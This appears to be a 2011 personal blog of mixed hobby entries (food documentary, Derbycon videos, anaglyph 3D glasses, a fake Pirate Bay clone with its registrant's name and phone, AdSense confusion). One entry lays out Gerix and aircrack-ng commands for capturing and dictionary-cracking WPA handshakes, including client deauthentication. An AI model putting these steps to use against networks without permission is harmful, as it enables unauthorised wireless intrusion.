Thursday, December 22, 2011

Farmers    Food Inc.   the truth about food, and large companies.

Thursday, December 1, 2011

Derbycon 2011 Videos And Conferences.   you can download them all here.  

Really nice Menu System located on Iron Geeks Site


Cracking Wpa For Free and charge.   upload the handshakes, and they will crack it for you.

Also or com..  Don't remember charges $17 to crack wpa passwords.  as of DEc 1, 2011, previous price used tob e 9.99 a year ago.

Wednesday, November 30, 2011

Anaglyph images what are they

3d pictures, or stereoscopes

This is a good link for more info.

Buy Cheap Glasses: Ebay or Dealextreme.
You can buy cheap glasses for $1.78 shipped from    I got mine on ebay for .06 cents shipped.

Info on how to create Anaglyph in photoshop. 

Tuesday, November 29, 2011

Where Does Gerix Store its Log file Backtrack 5

Where Does Gerix Store its Log file Backtrack 5

Ans. /root/.gerix-wifi-cracker/

Steps to Get it Via Gerix. 

In Gerix,
1) set card to monitor mode. Highlight Monitor Mode, then. 
2) rescan networks.  (hightlight networks) 
3) Highlight Network, and monitor card, clean old session,  now goto WPA tab.
4) in wpa tab,  click 1st start sniffing. 
---Auto Load victim 
--Client deAuthentication 
5. Run the crack on the test file, put your password in the list to test.

Once you get the handshake goto crack wpa, and select your dictionary file in, normal cracking.  File location /darkc0de.lst
root@bt:/pentest/passwords/wordlists# pwd
/pentest/passwords/wordlists/darkc0de.lst       <=  o in c0de is a zero no O

Manual Steps. 
2)airmon-ng start wlan0
3)airodump-ng mon0
4)airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0
5)aireplay-ng -0 5 -a (bssid) mon0
6)aircrack-ng (filename)*.cap -w (dictionary location)

Monday, November 28, 2011

whois is fake

ThePiratebay.EE  FAKE, I was google searching linux torrent, on novem 27, 2011 and everything came back  Real site is .org not .ee

It's a Fake, Clone.  Do not Donate, or Download anything. 

Donations Button to goto Paypal Name.

E-mail belongs to this person:

Aleksei Sivtsev (
Tel. +372.5583848

Creation Date: 07-Jul-2006
Expiration Date: 07-Jul-2013

The Main Domain is

Looks Like A Russian Site. 

OVerall Its a fake and clone, though well done.  

As of today November 28, 2011 looks like google bots have repaired the search results.  


Monday, November 14, 2011 Vs Along with Other Ways to make money online.   Build your own projects.   Any project you want to buy for 5 dollars.  -  Shows you the top channels and videos on youtube.  for reviews. for web search keyboards and traffic

Double Click DFP vs Google Adsense

DFP for Small business, and publishers.

I watched the video, I'm guessing its a more advanced version of ADSENSE.  However it wants me to log in with ADSENSE, and then I must enter the name it will send a check to??  This is already in adsense?  

What the Hell is DFP, and will it mess up my ADSENSE Account?

Then there is  the affiliate network program.    IS this part of ADsense?

i'm completely lost.   Also in adsense I have 1 website, added, and youtube.

Hosted AdSense for Content =  Youtube  ,  I have no clue what videos people are watching to click the ads.

Adsense for Content = My web pages.  

Also in this bloggger I'm assuming its tied to my "adsense for content"  however how do I know where I'm getting money for clicks from?  Is it from my webpage or blogger?  This thing I've set up?  Are the adds on the top and bottom making me any money, or is anyone clicking them?   I'm lost in the dumb interface? 

-------------3 unknown things---All I'm using is adsense what the heck are the other 2 dfp and affiliate?---

-------ok I'm making more progress------   is info on adsense...  this is their youtube channel.

---Conclusion so far------

Don't run dfp.  it needs code changed in adsense.. And I'm still lost in using adsense and knowing if my website or sites are monitized.
